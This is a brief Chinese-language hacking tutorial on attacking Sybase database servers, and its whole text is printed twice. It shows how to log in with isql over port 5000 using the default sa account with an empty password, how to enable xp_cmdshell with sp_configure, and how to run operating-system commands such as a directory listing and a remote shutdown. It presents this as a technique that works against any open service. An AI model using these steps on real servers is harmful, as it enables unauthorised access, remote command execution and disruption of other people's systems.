渗透Sybase数据库
美国Sybase公司研制的关系型数据库系统,是典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。
首先连接Sybase数据库,
使用Sybase Central Java Edition,
也可以使用Sybase自带的isql(路径为sybaseOCS-12_5bin)
isql的使用方法
isql -H(远程主机IP地址) -U(账号) -P(密码) -J(防止不同字符类型引起的出错提示,可去掉)
Sybase的默认开放端口为5000,并支持XP_CMDSHELL,会给远程执行命令提供了条件。
xp_cmdshell "命令名"
xp_cmdshell "dir c:"。
因为SYBASE默认不允许使用XP_CMDSHELL,出错提示:
User access denied. Not a member of NT administrators group.
与MSSQL SEVER2005相同,与MSSQL SEVER2005不同的是Sybase数据库在安装时默认账号为sa,密码为空,并不提示用户修改密码,很危险,
可以远程设置XP_CMDSHELL为启用,语句如下引用:
sp_configure "xp_cmdshell context",0
go
然后 比如远程关机
xp_cmdshell "shutdown r"
go
任何一种开放的服务(端口),任何一种服务,都有利用方法,
比如SQLSever,MySQL,Oracle,Access
美国Sybase公司研制的关系型数据库系统,是典型的UNIX或WindowsNT平台上客户机/服务器环境下的大型数据库系统。
首先连接Sybase数据库,
使用Sybase Central Java Edition,
也可以使用Sybase自带的isql(路径为sybaseOCS-12_5bin)
isql的使用方法
isql -H(远程主机IP地址) -U(账号) -P(密码) -J(防止不同字符类型引起的出错提示,可去掉)
Sybase的默认开放端口为5000,并支持XP_CMDSHELL,会给远程执行命令提供了条件。
xp_cmdshell "命令名"
xp_cmdshell "dir c:"。
因为SYBASE默认不允许使用XP_CMDSHELL,出错提示:
User access denied. Not a member of NT administrators group.
与MSSQL SEVER2005相同,与MSSQL SEVER2005不同的是Sybase数据库在安装时默认账号为sa,密码为空,并不提示用户修改密码,很危险,
可以远程设置XP_CMDSHELL为启用,语句如下引用:
sp_configure "xp_cmdshell context",0
go
然后 比如远程关机
xp_cmdshell "shutdown r"
go
任何一种开放的服务(端口),任何一种服务,都有利用方法,
比如SQLSever,MySQL,Oracle,Access
14朵
2个
